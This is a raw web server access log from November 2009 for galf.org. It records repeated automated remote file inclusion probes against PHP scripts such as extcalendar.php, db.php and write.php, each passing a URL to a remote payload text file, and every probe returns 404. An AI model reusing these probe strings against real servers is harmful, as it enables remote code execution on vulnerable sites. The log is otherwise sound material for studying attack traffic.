114.108.177.238 - - [23/Nov/2009:03:16:22 -0800] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:03:16:35 -0800] "GET /logs/access_090622.log//ashnews.php?pathtoashnews=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:16:57 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:16:58 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:16:58 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:17:23 -0800] "GET /common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:17:27 -0800] "GET /logs//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:17:27 -0800] "GET /logs/access_091102.log%20%20//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:25 -0800] "GET /logs//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:25 -0800] "GET /logs/access_090720.log//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:25 -0800] "GET /skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:29 -0800] "GET /logs/access_090720.log//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:29 -0800] "GET /skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:29 -0800] "GET /logs//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:53 -0800] "GET /skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:18:53 -0800] "GET /logs//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:03:18:54 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:19:36 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:19:39 -0800] "GET /logs/access_090629.log//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:19:39 -0800] "GET /logs/access_090629.log//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [23/Nov/2009:03:20:01 -0800] "GET /logs/access_090629.log//skin/buzzard_espoon/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:21:03 -0800] "GET /common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:21:03 -0800] "GET /logs//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:21:03 -0800] "GET /logs/access_091102.log%20%20//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:18 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:53 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:53 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:53 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:54 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:54 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:21:54 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:22:36 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:22:46 -0800] "GET /logs/access_091102.log//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:23:40 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:24:09 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:24:09 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:24:09 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:24:09 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:24:13 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:03:25:02 -0800] "GET /logs/access_090413.log//modify.php?dir_module=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:25:11 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:25:28 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:25:28 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:25:28 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:25:29 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:25:29 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:26:21 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:26:25 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:26:25 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:26:26 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:26:26 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:26:31 -0800] "GET /logs/access_091102.log//common/db.php?commonpath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:03:27:24 -0800] "GET /logs/access.log/news_detail.php?file=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:03:27:24 -0800] "GET /news_detail.php?file=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:03:27:24 -0800] "GET /logs/news_detail.php?file=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:03:27:24 -0800] "GET /logs/access_090831.log/news_detail.php?file=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:32:37 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.27 - - [23/Nov/2009:03:32:58 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:12 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:12 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:18 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:18 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [23/Nov/2009:03:34:27 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [23/Nov/2009:03:34:27 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [23/Nov/2009:03:34:27 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:36 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:34:42 -0800] "GET /logs/access_090525.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:47 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:54 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:54 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:34:56 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:34:59 -0800] "GET /logs/access_090525.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:29 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:29 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:30 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:53 -0800] "GET /com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:54 -0800] "GET /logs//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:35:54 -0800] "GET /logs/access_090803.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:36:21 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:36:28 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:36:32 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:36:32 -0800] "GET /error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:36:32 -0800] "GET /logs/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:36:32 -0800] "GET /logs/access_090504.log%20%20/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:38:09 -0800] "GET /logs/access_090518.log%20%20/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:38:09 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:38:13 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:38:13 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:38:13 -0800] "GET /logs/access_090504.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:38:21 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:38:32 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:38:34 -0800] "GET /logs/access_090921.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:03:38:39 -0800] "GET /logs/access_090309.log//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:38:44 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:39:12 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:40:30 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:40:45 -0800] "GET /logs/access_091012.log%20%20//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:03:40:58 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:03:40:58 -0800] "GET /logs/access.log//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
93.187.234.206 - - [23/Nov/2009:03:40:58 -0800] "GET /logs//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
93.187.234.206 - - [23/Nov/2009:03:40:58 -0800] "GET /include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:21 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:22 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:22 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:41:38 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:48 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:50 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:41:52 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:42:01 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:42:01 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:42:02 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:42:02 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:42:29 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:43:02 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:43:36 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:44:24 -0800] "GET /error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:03:44:24 -0800] "GET /logs//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
